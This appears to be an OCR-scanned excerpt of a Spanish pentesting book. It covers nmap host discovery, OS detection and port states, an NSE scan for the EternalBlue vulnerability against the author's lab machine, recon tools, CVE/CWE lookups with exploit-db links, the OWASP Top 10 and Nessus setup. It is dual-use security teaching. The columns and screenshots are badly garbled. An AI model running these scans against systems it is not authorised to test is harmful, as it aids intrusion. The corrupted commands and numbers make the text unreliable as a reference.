Service Info: 05: Linux; CPE: cpe:/o: linux: linux kernel 








OpenSSH 6,6, 1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 
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Algo importante que mencionar es que nmap por 
defecto, escanea los 1000 puertos más comunes, 
así que si quieres escanear un puerto/servicio que 
sea poco común, deberías decirselo 
explícitamente. 

La práctica anterior sirve de cierta forma para 
encontrar información de un sistema externo, si por 
ejemplo quieres escanear a un sistema en tu red 
local ¿qué se hace? Esto es todavía más sencillo, 


primero, te interesaría saber si en sí, el sistema 


está “vivo” en la red, para esto, basta con escribir el 


comando nmap -sP <IP>/24, esto lo que hará es 


que escaneara todas las IPs dentro de ese 


segmento y te dirá quien está recibiendo y 


mandando respuestas. 


kali:~# nmap -sP 192.168.1.1/24 





En las direcciones IPV4, cada numero representa 8 








, | bits, por lo que decirle qu | 
Service detection performed, Please report any incorrect results at https: //nmap,org/su p q que escanee 24 bits, lo que 


Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds significa que escanee a 3 dígitos, que son los que 


están en ese segmento de la red, pero pudiste 
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haber puesto simplemente un rango, algo como ARP (que son menos comúnmente filtrados) para 
192.168.1.0-254 y habría sido lo mismo. 


Podrás esperar como respuesta algo similar a esto 


hacerlo. 


Seguido de eso, tu siguiente pregunta en una red 


ARP Ping Scan Timing: About 1.96% done; ETC: 16:06 (0:00:50 remaj += lla 08557 ¿qUe Sistema OBeralivo Nenen 


Nmap scan report for 192,168,1.70 esos sistemas? Para esto, utilizamos un comando 
Host is up (0.0014s latency). . A ; 

MAC Address: 9C:B6:D0:10:85:81 (Rivet Networks) similar, pero con la opcion -O, algo asi como nmap 
Nmap scan report for 192,168.1.71 0 <IP>/24, lo que hace este comando, es que 

Host is up (0,000575 latency). i | 

MAC Address: 70:4F:57:28:BE:84 (Tp-link Technologies) obtiene los servicios del sistema, y hace una 

Nmap scan report for 192.168.1,83 
Host is up (0,000079s latency). 
MAC Address: 4C:CC:6A:7F:7F:EE (Micro-star Intl) la base de datos, dandote un sistema operativo 
Nmap scan report for 192,.168.1.132 
Host is up (0.00145 latency). 


MAC Address: E4:F0:42:4B:FA:02 (Unknown) 
Nmap scan report for gpon-infinitum,nokia.com (192.168. 1,254) ' ~# nmap -0 192 ' 100 ' I : 1/24 


Host is up (0.0096s latency). 

MAC Address: D8:37:BE:4D:AF:28 (Shenzhen Gongjin Electronics) € l 
Nmap scan report for 192.168.1.67 Este es un ejemplo del resultado que obtendrias, 
Host 15 Up. 

Nmap done: 256 IP addresses (6 hosts up) scanned in 4.78 seconds 


correlación entre ellos y los sistemas operativos en 


“estimado”, pero con decente confiabilidad. 


como puedes notar, te muestra los puertos y 
servicios, seguido de una “estimación” del sistema 


Esta acción es lo primero que harías en una red operativo, lo que sucede, es que no existe un 


local, y si, no te da una cantidad inmensa de “paquete” que puedas mandar para “preguntar” el 
información de todos los sistemas, pero te dice | sistema operativo, entonces lo que hace nmap es 
cuántos sistemas están en la red, y utiliza paquetes preguntar ¿qué servicios tiene corriendo el sistema, 


y preguntar a su base de datos “que sistemas 


190 191 














y WHITES WHITE SUIT 















operativos usan estos servicios?” y te da la NSEDoc 
index 
respuesta a ello. NSE Documentation 
Host is up (9,0355 latency) Estas son las t í ERARE 
other addresses for scanme.nmap,org (not scanned): 2600:3c01: :f03c:91ff: fe18: b021 > A cams as rondde 
Not shown: 995 closed ports . brute 
O NCE que nmap ha desarrollado scripts Goo, 
22/tcp open ssi T - discovery 
25/tep filtered satp especializados, por ejemplo, dos 
80/tcp open  Nitp : i exploit 
9929/tcp open nping-echo vamos a Imaginar que PARA] 
31337/tcp open Elite a TA fuzzer 
Aggressive 0S guesses: Linux 3.10 - 4,11 (94%), Linux 3.2 - 4,9 (9%); Linux 4.4 (96%), HP P2000 63 NAS device 190%), Openirt ; encontramos una maquina con nose 
Bay Reon ETE MEM Le > (ate) Inv 21h - 4.6 (90%). Linux 4.10 (98%), Linux 4.2 (98%), Asus RT-ACéé ee te 
7-90 (Linux 2.6.22) (90%), Linux 3.13 or 4,2 (98%), Linux 3.16 - 4.6 (90%), Linux 4.10 (96%), Linux 4,2 (90%), ASUS RT-ACGéy | ' eae 
No exact 0S matches for host (test conditions non-1deal), Windows 7, queremos identificar version 
vuln 


Network Distance; 10 nops 


si tiene la vulnerabilidad 


S cripts de nmap Eternalblue, unas de las vulnerabilidades más 


Ya vimos un poco de lo que puede hacer nmap, sin comunes en este sistema operativo, podríamos 


embargo, hay miles de otras funciones que tiene simplemente irnos al buscador que está a la 


nmap, desde encontrar vulnerabilidades, hasta izquierda de la página y escribir Eternal Blue. 


escanear para detectar firewalls o sistemas de 


Search Results 


About a3 esus ¿0 11 seconds; 


seguridad, funciones para evadir sistemas de 
smbuln-ms17-0*0 NSE Script 


DONE Ora nsedocsciipis/smd-vulnsnsi7-O10 bund 
Mamps lo delect ta Microsof SMBv1 server is vulnerable ta a remote code execution vulnerability (ms17-010. a.k.a EternalBlue) The vulnerability is actively 


seguridad. 
Para esto, vale la pena hablar de los scripts de 


nmap, que estan en su base de datos oficial, para : 
Hacer clic en el script que hará el escaneo para 


utilizarlo, deberás ir a m 
dicha vulnerabilidad y leer los detalles de cómo se 


httos://nmap.org/nsedoc/index.html , donde A 
ite utiliza en la pagina inferior de la pagina. Lo que 
encontraras lo siguiente: 
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más nos interesa es el ejemplo de uso y los n report for 192,168.1.141 i 
yp (0.000275 latency). 





argumentos posibles. 
TATE SERVICE 
aen microsoft-ds 


Example Usage ress: 00:0C:29:BE:D4:77 (VMware) 


| ript results: 
e nmap -p445 --script smb-vuln-ms1/-010 <target> wln-ns17-010: 
NERABLE: 
ate Code Execution vulnerability in Microsoft SMBvl servers (ms17-010) 
e nmap -p445 --script vuln <target> rate: VULNERABLE 
ins; CVE:CVE-2017-0143 
nisk factor: HIGH 
A critical remote code execution vulnerability exists in Microsoft SMBv1 


Y simplemente lo probamos, en mi caso el sistema servers (ms17-010). 


Windows 7 en mi red tiene la IP 192.168.1.141, asi isclosure date: 2017-03-14 
heyerences: 
que escribo nmap -p445 --script smb-vuln-ms17- httos;//blogs. technet microsoft. com/msrc/2017/05/12/customer-quidance-for-wannacrypt-attacks/ 
https: //cve. mitre. org/cgi-bin/cvename. cgi ?name=CVE-2017 -0143 
010 192.168.1.141 nttos://technet microsoft, com/en-us/library/security/ms17-010, aspx 


+ nmap -p445 --script smo-vuln-ms17-010 192,168, 1 


ne: 1 IP address (1 host up) scanned in 0,69 seconds 


Y como respuesta, obtendras algo como esto, en lo Asi como este, hay cientos de exploits que podrias 


que mi principal interés es si dicha maquina utilizar para obtener toda clase de informacion de | 


los sistemas que vayas a auditar, simplemente 





es el caso, podemos asumir que un ataque con | tienes que saber que buscar, como y donde en la 


este exploit comprometeria a la maquina. | base de datos de nmap. 


aparece con la palabra VULNERABLE, y dado que 
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Estados 


En nmap, de seguro notaste algo llamado STATE 
en el escaneo de servicios, esto se refiere al 
estado en el que está dicho puerto, estos son los 
estados que puede estar y que significan: 
1. OPEN/ABIERTO 
Esto significa que el servicio está aceptando 
paquetes TCP, UDP o SCTP en este puerto, 
Estos son los puertos que más nos 
interesan, ya que cada puerto abierto es una 
potencial entrada a un ataque. 
2. CLOSED/CERRADO 
Esto significa que el puerto es accesible, sin 
embargo, no hay servicio que responda en 
este puerto. Esto es útil para saber si el 
objetivo está activo, y ayuda en la detección 
de sistema operativo, también, vale la pena 
monitorearlos, ya que podrían abrirse si se 
inicia el servicio en el sistema. 
3. FILTERED/FILTRADO 


Esto sucede cuando nmap no puede 
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determinar si el puerto está abierto debido a 
que los paquetes que manda nmap están 
siendo filtrados. Esto podría ser debido a un 
firewall, es el tipo de estado que más frustra _ 


un ataque. 


. UNFILTERED/NO-FILTRADO 


El estado no filtrado significa que el puerto 
es accesible, pero nmap es incapaz de 
determinar si está abierto o cerrado. Solo el 
escaneo de paquetes ACK, que se utiliza 
para identificar reglas del firewall, clasifica 
puertos en este estado, podrás encontrar 
más información al escanear el mismo 
puerto con otro tipo de escaneo, tal como 
SYN o FIN, para determinar si el puerto está 


abierto o cerrado. 


. OPEN|FILTERED/ABIERTO|FILTRADO 


Nmap da este estado cuando no puede 
identificar si el puerto está abierto o filtrado. 
Esto pasa cuando los puertos abiertos no 


dan respuesta. 
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6. CLOSED|FILTERED/CERRADO|FILTRADO 
Esto sucede cuando nmap no es capaz de 
determinar si un puerto está cerrado o 


filtrado, sucede para el escaneo “IP ID idle”. 


Otros comandos de nmap 


*nota: las IP y puertos son ejemplos, se debe 


usar la apropiada para tu caso en específico 









ES 





Comando Descripción 
Selección de objetivo y escaneo 


nmap 192.168.1.1 o | Escanear IP (1000 puertos) u 
nmap www.página.com | objetivo 


nmap 192.168.1.1-20 Escanear rango de IPs 


Escanear objetivos de una lista 
txt 
Selección de puertos 


nmap -p 22 | Escanear un solo puerto 
192.168.1.1 

nmap -p 22,80,443 | Escanear varios puertos 
192.168.1.1 

nmap -p 1-100 | Escanear un rango de puertos 



















192.168.1.1 


Tipos de escaneos de puertos 

nmap -sT 192.168.1.1 | Escanear utilizando 
conexiones TCP 

nmap -sU -p 123 | Escanear puertos UDP 

192.168.1.1 
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nmap -Pn -F | Escanear e ignorar discovery 
192.168.1.1 (util para evadir algunas 
restricciones de firewalls) 


Detección de servicios y sistemas operativos 
Detectar sistemas operativos 


Detectar sistemas operativos y 
servicios 


nmap -sV --version- | Detección agresiva de 


intensity 5 192.168.1.1 | servicios 


nmap -sV  --version- | Detección menos agresiva de 
intensity 0 192.168.1.1 | servicios 


Guardando información de Nmap 


nmap -oN archivo.txt | Guarda el resultado como txt 
192.168.1.1 


nmap -TO 192.168.1.1 | Determinar nivel de paranoia 
en el escaneo (0 es más 
paranoico, 5S es menos 
paranoico) 
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OSINT + Reconocimiento Activo - Obtener 


informacion con una sola herramienta 


Striker es una herramienta escrita en Python 
parecida a Discover, ya que obtienen cosas muy 
parecidas, pero la diferencia clave es que Striker 


no tiene opción para reconocimiento 100% pasivo, 


e y dentro de las acciones que hace, realiza con 


nmap un escaneo de puertos, por lo que tengo que 


clasificarlo como reconocimiento activo. 


La ventaja que tiene sobre Discover, es que la 


_ Información la obtiene mucho más rápido (en mi 


experiencia tiene un poco menos de confiabilidad, 
lo uso cuando no tengo tanto tiempo). 

Otra diferencia clave, es que Striker solo permite 
reconocimiento en dominios. 

Para utilizarlo, deberás ir a la carpeta en la que 
está la herramienta, que es 
lopt/Reconocimiento/Striker 


Dentro de ahí, tienes que darle permiso con 
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chmod +x striker.py, y finalmente ejecutar el 


script con ./striker.py 
‘/opt/Reconocimiento/Striker# ./striker 


Luego de ejecutarlo, te pedira un dominio en donde 


se realizara el reconocimiento. 


[?] Enter the target: | 


Luego de darle el dominio, empezará a mostrar 
resultados, como, por ejemplo: 
1. Probabilidad de honeypot 
CMS 
información Whois 
Robots.txt 
Escaneo de servicios 
Records DNS, MX, Hosts(A), TXT 


Sy y» pop 
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7. Mapa DNS 

8. Correos electrónicos 

9. Hosts 

10. Ligas vulnerables a SQLi 
Generalmente el escaneo no toma más de un par 
de minutos, así que, para la información obtenida, 


la considero una herramienta bastante útil. 


Análisis de Vulnerabilidades 


En la etapa de análisis de vulnerabilidades se 
utilizan distintas herramientas para determinar los 
puntos débiles de un sistema, y por donde 
podríamos atacar. 

Generalmente lo que estamos buscando es una 
vulnerabilidad, es decir, un punto débil 
documentado para el que existe un ataque que 
podamos utilizar para comprometer la seguridad 


del sistema. 
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CVEs y CWEs 


Las vulnerabilidades las conocemos debido a que 
existen organizaciones e investigadores en 
seguridad informática que las documentan y 
reportan, y el formato en el que documentan y 
reportan dichas vulnerabilidades, se llama CVE, o 
sea Common Vulnerabilities and Exposures, 
dentro de un código CVE es donde se pueden 
encontrar todas las vulnerabilidades reportadas, es 
muy importante entender esto, debido a que todos 
los analizadores de vulnerabilidades utilizan este 
formato para mostrarte las vulnerabilidades del 
sistema. 

Existen varias bases de datos donde podrías 


encontrar estos CVEs, como, por ejemplo: 
1. http://cve.mitre.org/ 


2. https://www.cvedetails.com/ 
3. https://nvd.nist.gov/ 
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Dentro de estas bases de datos, podras encontrar 
vulnerabilidades reportadas. Estan catalogadas en 
este formato: CVE-año-ID, y en algunas de estas 
bases de datos hasta te da fuentes de que ataques 
y herramientas que pueden explotar dichas 
vulnerabilidades. 

Sin embargo, no todas las vulnerabilidades son 
iguales, algunas son más peligrosas que otras, 
para clasificar esto, existe el CVSS, que clasifica 
del cero al diez y que tan peligrosa es una 


vulnerabilidad. 
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Distribution of all vulnerabilities by CVSS Scores Puedes utilizar esto para determinar el nivel de 


CVSS Score Number Of Vulnerabilities Percenta 


3 riesgo de una organización, combinando los niveles 


2891 2.8 de CVSS con otros factores. 





| es & Vulnerability Types 


y Impac Complete (There is total information disclosure, resulting in all system files being revealed 
Complete (There is a total compromise of system integrity is a compl j 

{ ipromise of system integrity, There is a complete loss of system protection, resulting in the entire system being 
compromised. ) 


5 Impad Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.) 
= : | ar i oplety Meda {The access conditions are somewhat specialized. Some preconditions must be salistified to exploit) 
SS one 8. Not required {Authentication is not required to exploit the vulnerability} 
Sia i 3 y Type 5) Execute Code 
2 


Otra cosa importante que notar en los detalles de un 
CVE, es la documentación y referencias, que te podrían 
- dar indicaciones de cómo funciona el ataque, contra 
qué sistemas, y de donde puedes obtener la 
a nó > o código para ejecutar el ataque si es que 
dependiendo de la categoría: la confidencialidad, i 
integridad, disponibilidad, y que tan difícil es que i 


esta vulnerabilidad sea utilizada. 
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- Products Affected By CVE-2017-0143 


# Product Type Vendor Product Version Update Edition Language 


1 Application Microsoft Server Message Block 1.0 








Version Details Vulnerab lit de 
= Number Of Affected Versions By Product 


Vendor 


Microsoft 


Product Vulnerable Versions 


Server Message Block 1 





= References For CVE-2017-0143 


http: //www.securitytracker.com/id/1037991 
SECTRACK 1037991 


https: //cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf CONFIRM 
https://portal.msrc.microsoft.com/en-US/security-quidance/advisory/CWE-2017-0143 CONFIRM 


https: //www,exploit-db.com/exploits/41891/ 
EXPLOIT-DB 41891 


https: //cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf CONFIRM 
httos://www.exploit-db,com/exploits/43970/ 

EXPLOIT-DB 43970 

https://ics-cert.us-cert. gov/advisories/ICSMA-18-058-02 
https://veww.exploit-db.com/exploits/41987/ 

EXPLOIT-DB 41987 


http://www. securityfocus.com/bid/96703 
BID 96703 Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability Release Date:2017-05 





~ Vulnerability Conditions 
Vulnerability is valid if product versions listed below are used TOGETHER WITH(AND) 


Microsoft Windows 10 

Microsoft Windows 10 1511 
Microsoft Windows 10 1607 
Microsoft Windows 7 SP1 

Microsoft Windows 8.1 

Microsoft Windows Rt 8.1 

Microsoft Windows Server 2008 SP2 
Microsoft Windows Server 2008 R2 SP1 
Microsoft Windows Server 2012 Gold 
Microsoft Windows Server 2012 R2 
Microsoft Windows Server 2016 
Microsoft Windows Vista SP2 


e Microsoft Server Message Block 1.0 
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Como podras notar, en “references” hay varias 
ligas que hacen mención de codigo que puedes 
utilizar para realizar el ataque que explote esta 
yulnerabilidad, por ahorita solo debes saber donde 
obtener ese código e información, en la sección de 
explotación hablare de como de hecho utilizarlo. 
Como última nota quiero aclarar, que el CVE se 
refiere a vulnerabilidades en sistemas o 
tecnologías, no tipos de ataque, que veremos 
luego. 

Adicionalmente al CVE, existe algo llamado CWE, 
que son siglas de Common Weakness 
Enumeration. Los CWE hacen referencia a 
debilidades del software, pero no vulnerabilidades, 
seguramente te preguntaras, ¿cuál es la 
diferencia? Pues bastante, una vulnerabilidad, te 


permitirá directamente comprometer la seguridad 





en una de las tres áreas si logras explotarla. Por 
otra parte, una debilidad, de hecho, no | 
necesariamente te permitira comprometer la 

seguridad en ninguna forma importante, pero si 


este es el caso, entonces ¿por qué sigue siendo 
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importante? Bueno lo que sucede, es que muchas 
veces una vulnerabilidad no es suficiente como 
para comprometer a un sistema, vamos a dar un 
ejemplo, digamos que logras subir un archivo 
ejecutable malicioso PHP en un servidor web, ahí 
está una vulnerabilidad que te permite subir ese 
archivo, sin embargo, sin acceder, nunca se va a 
ejecutarlo y por lo tanto no podrías obtener acceso 
al servidor, pero, por otra parte, si el servidor tiene 
la debilidad de que puedes ver los directorios 
completos del servidor, y logras por ese medio 
ejecutar el archivo malicioso, es así cómo 


obtendrás acceso. 


Para comparar, digamos que quieres entrar a una 
casa para robar, la vulnerabilidad es el equivalente 
a que hay una ventana sin llave en el segundo 
piso, mientras que la debilidad es que tengas todos 
tus objetos de valor a plena vista y sin esconder en 


tu habitación. 
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Para buscar e interpretar las debilidades, basta con 
buscar su ID, que se estructura como CWE-ID, 
esto aparecerá en muchos analizadores de 
vulnerabilidades, así que es útil saber cómo 
buscarlo e interpretarlo. 

| Para buscar un CWE, basta con meterse a 
httos://cwe.mitre.org y buscar el ID, por ejemplo, si 
busco el ID CWE-538, me mostraría una 
descripción de que significa esta vulnerabilidad. 
yE-538: File and Directory Information Exposure 

$10: 538 


tion: 5 


esses Filter: ‘Basic X ; 


s product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. 


En la misma pagina te muestra como se causa esta 
debilidad. 


Mk Mates of Introduction provide information about how and when this weakness may be introduced, The Phase identitas a paint ln the software bfe cycle at which introduction may occur, while the Note provides a 
sear rated to introduction during the given phase. 

Note 

CHISSION: This weakness is caused by missing a security tactic during the arch tecture and design phase. 

OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. 
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Y finalmente, las posibles consecuencias, en donde 
podria afectar dicha debilidad, y las posibles 


formas en la que se podria mitigar o corregir la 
debilidad. 


Common Consequences : 
The table below species different individual consequences assiciated with the weakness. The Scope identifies the apsEcation security ares that is viclated, while the Impact describes the negative techn n 
an adversary Succecds la exploiting this weakness, The Likelihood provides information about how likely the specific consequence is expected to be sean relative to the other CONSEQUENTES in the let Forera 
high lieliiead that a waakness wil he exploitad to achieve a certain impact, but a low iikelihood that it will be exglaited to achieve a dierent impact i: 


Scope Impact 


Confidentiatity Tataia Impact: Read Fes or Orectones 


p 


Patential Mitigations 


Phases: Architecture and Design; Operation; System € onfiguration 
Do not expose file and directory information to the user. 


Las debilidades no son tan criticas como una 
vulnerabilidad, sin embargo, combinarse con otros 
factores, podrian darle un camino a un atacante 
para comprometer la seguridad de la informacion. 
En este caso, por ejemplo, que esencialmente 
permite a un atacante ver los directorios y archivos, 
podria afectar seriamente la seguridad empresarial 
si un atacante logra ejecutar por este medio algún 
archivo malicioso, o si el administrador sube por 
accidente algún archivo confidencial y el atacante 
lo descarga por la debilidad que encontró, incluso 
con el simple hecho de darle información al 
atacante. Esta debilidad estar poniendo en 
potencial peligro la información de la organización, 


las debilidades no deberían ignorarse. 
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OWASP 


Open Web Application Security Project 
(OWASP) es la organización de código abierto sin 
fines de lucro más importante en temas de 
seguridad en páginas y aplicaciones web, tanto así 
que se ha convertido prácticamente en un estándar 
en cuanto a que fallas y vulnerabilidades hay que 
buscar primero y corregir en una página y (0 
aplicación) web con el famoso OWASP top 10. 


GpowasP 


OWASP top 10 

Para leer documentación de OWASP, es 
completamente gratis, simplemente debes entrar a 
httos://owasp.org y buscar el tema que deseas 
investigar, lo primero que debes conocer que ha 
hecho OWASP, que es fácilmente una de las cosas 


más importantes, es el OWASP top 10, que 
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o 1 2 y 
puedes encontrar en | contraseñas, claves, tokens de sesiones, o utilizar 


https: //www.owasp.org/index.php/Top_10- 
2017 Top 10, esta lista es de los 10 riesgos de 


alguna otra falla que le permita al atacante asumir 


a secuestrar la identidad de una víctima ya sea 


seguridad en aplicaciones/páginas web más temporal o permanentemente. 


comunes y peligrosos publicada en el 2017, que es 





la lista más nueva al momento de escribir este libro 3. A4:2017 - información Sensible Expuesta 


hablaré un poco de ellos. Muchas aplicaciones web y APIs no protegen 
1. A1:2017 — Inyección 

Fallas de inyección a tecnologías como SQL, 

NoSQL, OS, LDAP, etc., esto ocurre cuando data 


no confiable se manda a un interpretador como 


adecuadamente data sensible tal como informacion 
B aciera o de salud, por esto, un atacante podría 
robar o modificar información que no haya sido 
adecuadamente protegida para realizar algún 

parte de un comando o búsqueda, y la data del | fraude bancario, robos de identidad, u otro tipo de 


atacante engaña al interpretador para que este ataques. La información sensible puede ser 


comprometida siempre y cuando no tenga 


protección adicional tal como encriptación en los 


ejecute comandos no autorizados en el servidor o 
que le de acceso al atacante a la información de la 
víctima sin haber tenido la autorización adecuada. dispositivos o en tránsito (tal como encriptación 
punta-punta). 

2. A2:2017 - Autenticación rota 


Funciones de una aplicación relacionadas con la 4. A4:2017 - Entidades XML Externas (XXE) 


autenticación y manejo de sesión de usuarios son Muchos procesadores viejos o mal configurados 
comúnmente implementadas de forma incorrecta, evalúan referencias de entidades externas dentro 


permitiendo a los atacantes comprometer de documentos XML, y por lo tanto las entidades 
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externas pueden ser utilizadas para encontrar 
archivos internos utilizando el manejador URI, así 
como archivos internos compartidos, puertos 
escaneados internamente, código ejecutable 
remoto, o ataques de negación de servicios. 

Ya sé que esta falla es un poco difícil de entender, 
así que lo pondré más fácil: 

a veces una aplicación web procesa data en el 
XML de forma incorrecta, y ese XML tiene alguna 
referencia a una entidad externa, un atacante 
podría modificar esa referencia de forma que lo 
apunta a un programa malicioso que podría 


comprometer la seguridad de la aplicación web. 


5. A5:2017 - Control de acceso roto 
Las restricciones en lo que los usuarios 
autenticados en una aplicación/página web pueden 
hacer no siempre está adecuadamente 
configurada, de forma que un atacante podría 
explotar las fallas en esta configuración para 
obtener acceso no autorizado a funcionalidad o 


información adicional como acceder a información 
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de otros usuarios, ver archivos sensibles, o 
modificar accesos o data. 

Piensa en esto a una persona que entra a una 
compañía como “invitado”, y cómo no está siendo 
vigilado, se mete a alguna área con “acceso 
restringido”, lo cual puede hacer que tenga acceso 


a información sin autorización. 


6. A6:2017 - Mala configuración de 
seguridad 

Esta es la falla más común, sucede debido a fallas 
en la configuración por defecto, almacenaje abierto, 
cabeceras HTTP mal configuradas, errores de 
verbosidad dando información sensible. Para evitar 
esto todos los sistemas, librerías, frameworks y 
aplicaciones deben de ser adecuadamente 
configuradas en seguridad y además 
parchadas/actualizadas regularmente. 
Un ejemplo de esto podría ser digamos una página 
de WordPress en la que el administrador no 
actualizar sus plugins, y por lo tanto encontrarás 


una falla en uno de ellos. 
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7. A7:2017 - Cross-site Scripting (XSS) 
Las fallas de XSS ocurren cuando una aplicación 
incluye información no confiable en una página web 
sin la adecuada validación, o acepta 
actualizaciones a la página web desde información 
proveniente de un usuario que permitan crear 
HTML o JavaScript dentro de la página web 
afectada. Esto puede permitir a un atacante 
ejecutar scripts maliciosos que pueden secuestrar 
la sesión de usuarios, “humillar” páginas web, o 
redireccionar a los usuarios a sitios maliciosos. 
Este es un ataque del lado del cliente, es decir, se 


busca atacar al usuario que utiliza la página web. 


8. A8:2017 - Deserialización insegura 
La deserialización insegura, comúnmente lleva a la 
ejecución remota de código, e incluso si esto no 
sucede, sigue siendo un peligro porque puede 
permitir a un atacante que realice inyecciones, 


escalar privilegios, entre otros. 
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9. A9:2017 - Usar componentes con 
vulnerabilidades conocidas 

Hoy en dia es poco comun que se cree una 
pagina/aplicacion web u otra tecnologia sin utilizar 
partes externas como librerias, frameworks, 
plugins, etc para ahorrar tiempo y esfuerzo, sin 
embargo, si este código tiene errores debido a que 
el desarrollador cometió un error, toda la aplicación 
podría ser comprometida, desde un atacante tomar 
control del servidor, hasta pérdida de información. 
Una analogía podría ser, digamos que estamos 
construyendo una cadena de muchas partes, si una 
de ellas es débil, toda la cadena se puede romper. 
Un ejemplo real es si tu creas una aplicación web, 
digamos, con MongoDB y se encuentra una 
vulnerabilidad en MongoDB, toda tu aplicación se 
puede ver comprometida, así mismo, si creas una 
página en WordPress y activas un plugin con 


alguna vulnerabilidad, toda la página web podría 


verse comprometida. 
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40.A10:2017 - Falta de control de registros 

El monitorear insuficientemente los registros, 

combinado con falta de o mala implementación de 


un plan de respuesta de incidentes, permite a los 


Analizadores de vulnerabilidades 


Ahora veremos analizadores de 
vulnerabilidades, un analizador de 


de add vulnerabilidades es un software que realiza una 
atacantes seguir atacando más sistemas, obtener CV 
serie de verificaciones automatizadas, tal como 

persistencia, pivotear a otros sistemas, extraer, 
m ; escaneo de puertos, servicios, y usando dicha 
modificar o eliminar información. La mayoría de los 7 
informacion, busca automaticamente 
hackeos son detectados después de mas de 200 o 
pon". vulnerabilidades (CVEs y CWEs) en el sistema que 
días, y típicamente son detectados por auditorias 
está analizando. Esto es muy útil, ya que en 
externas, no internas, debido a esta falta de : 
ambientes organizacionales estos softwares 





monitoreo. Tae! 
l permiten hacer auditorías a gran escala mucho 
OWASP Top 10 - 2013 => OWASP Top 10 - 2017 id l D 
ore > [nuzotranicion mas rapido, y como auditor nos facilita encontrar 


fallas superficiales rapida y facilmente. 





A2 — Broken Authentication and Session Management | y A2:201 7-Broken Authentication 


A3 - Cross-Site Scripting (XSS) M A3:201 7-Sensitive Data Exposure 


Quiero dejar algo claro, un analizador de 


vulnerabilidades no es reemplazo para un 


experto y conocimiento/experiencia en 
ciberseguridad, y si se trata como tal, podría dar 


A4 - Insecure Direct Object References [Merged+A7] y — Jj A4:2017-XML External Entities (XXE) [N w 






A5 - Security Misconfiguration Y) A5:2017-Broken Access Control [Merged] — 


A6 — Sensitive Data Exposure | A 'A6:2017-Security Misconfiguration 


A7 - Missing Function Level Access Contr [Merged+A4] | |) 'A7:2017-Cross-Site Scripting (XSS) 
un falso sentido de seguridad, es solo una 


A8 - Cross-Site Request Forgery (CSRF) A8:2017-Insecure Deserialization [NEW, Comm 
A9 - Using Components with Known Vulnerabilities => A9:201 7-Using Components with Known Vulner herramienta más, se deben pr obar los falsos 
A10 - Unvalidated Redirects and Forwards _ [E] A10:2017-Insufficient Logging&Monitoring (NE positivos/negativos, y utilizar experiencia y 
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conocimiento técnico para realizar una auditoría 
que valga la pena. 

Ahora mencionaré algunos de los analizadores de 
vulnerabilidades más comunes y útiles que 
utilizamos, no todos son iguales, algunos son 
específicos a una tecnología en particular, otros 


son más versátiles. 


Nessus 


Nessus es un software de análisis de 
vulnerabilidades creado por Teenable, es uno de 
los mejores y más utilizados sistemas de análisis 
de vulnerabilidades en el mercado, y en una 
auditoría un software como este puede ser muy útil. 
La particularidad de Nessus, es que tiene módulos 
para hacer análisis de vulnerabilidades 
prácticamente a cualquier sistema, tanto local 
como global, una de las cosas por las cuales es 
particularmente útil en la industria, sin embargo, 
como casi todas las herramientas en 
ciberseguridad, es una herramienta costosa, pero 


podemos utilizar casi todas sus funciones en la 


222 














An | 


versión de prueba, que es renovable 
ilimitadamente. 

Para instalarlo, deberás ir a 
https://www.tenable.com/products/nessus/nessus- 
professional/evaluate y solicitar una prueba, basta 
con tener un correo con un dominio comprado para 
que te manden una clave a tu correo electrónico, 
descarga el software en 
httos://www.tenable.com/downloads/nessus (es 
compatible con Linux, Windows y OSX), y haz clic 
en el instalador. 

Luego de iniciar la instalación, haz clic en el botón 
verde y correr sin seguridad, luego que termine de 
cargar, crea un usuario y contraseña en la 


siguiente pantalla. 


Para abrir Nessus, deberás tener el proceso 
abierto, y abrir una ventana de tu navegador en la 
página: https://localhost:8834 
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Nessus @B 


Create an account 


To use this scanner, an account must be created, 


Register your scanner 

Enter an activation code below to run your scanner 
7 ncaliy ar choose one of the dropdown options to 

This account can execute commands on remote | locally or choose one of the dropdown options t 

targets and should be treated as a root user. run it in managed mode. 

Username ” | ‘Scanner Type 


| ; 
| Er | Home, Professional or Manager x 
Í \ H 















Password * Activation Code * 





A 


— 
| Ne O 
AAA 


E A PIE 





Settings Back = Continue 3 





Lites AS 


O 2018 Tenable + inc. f 
Y finalmente se inicializará, esta es la parte mas 
7 i lenta de la instalación. 
Luego aquí introduciremos la clave que te 
mandaron a tu correo. 
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pero están compuestos de módulos, y como tal, tu 
podrías crear uno propio en base a tus 


necesidades con la primera opción. 


Eean Templates 






aria liz | 
Initializing ae 
ae a e RP rune < ia a gn S ro J 
Please YYTE while Me SOUS E E prepa: Tes the files needed Scanner 
to scan your assets, ft E aà r: ' 
| Advanced Scan Audit Cloud infrastructure Badlock Detection Bash Shellshock Detection Basic Network Sca 
E hd y) Agt thes Es cabe Fishy z té » mf th 2 NE me PE E eE & Ast Nts mn estates & 3 


| 


& © 9 El 


MOM Confia Audit f 





Hest Lemp Intel ANT. Sa pra Internal PCI Network Scan Malware Scan 
“3 f en Msg CENAS Wane it ev ce Vicia 21 


aN potte eues pmp SCAP and OVAL Auditina Shadow Brokers Scan Spectre and Meltdo 


© 2018 Tenable , inc. 


pe Dyte sopa Scan 


Finalmente, te debería de aparecer una pantalla 
similar a la siguiente. Vamos a decir que queremos escanear dos 


Nessus son sistemas en una red interna y buscar si tienen 


vulnerabilidades, para esto, seleccionaremos un 
escaneo básico (basic network scan), que busca lo 


pation mas comun en todos los sistemas, junto con 


§ kne 
reconocimiento activo. Este escaneo, como puedes 


Aquí es donde iniciaremos los escaneos, para 
ver, te permite escanear a varias IPs al mismo 


Iniciar uno, basta con hacer clic en el botón azul a tiempo, y te permite escanear tanto sistemas 


la derecha, y seleccionar el tipo de escaneo que locales como globales, como el ejemplo de la 


queremos realizar, estos son modelos de escaneos Sai 
página de nmap. 


para diferentes tipos de sistemas, son muy útiles, 
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Nessus @ 


Initializing 
Please wait while Nessus prepares the files needed 


to scan your assets, 








=| 2018 Tenable , Inc. 


Finalmente, te deberia de aparecer una pantalla 


similar a la siguiente. 
ESTE » | Sons 


Ry Sars 
i & \. Som 
Mm si sce 


ne 
Ce = ae ee 
A nah 


Q tetas 
EA 
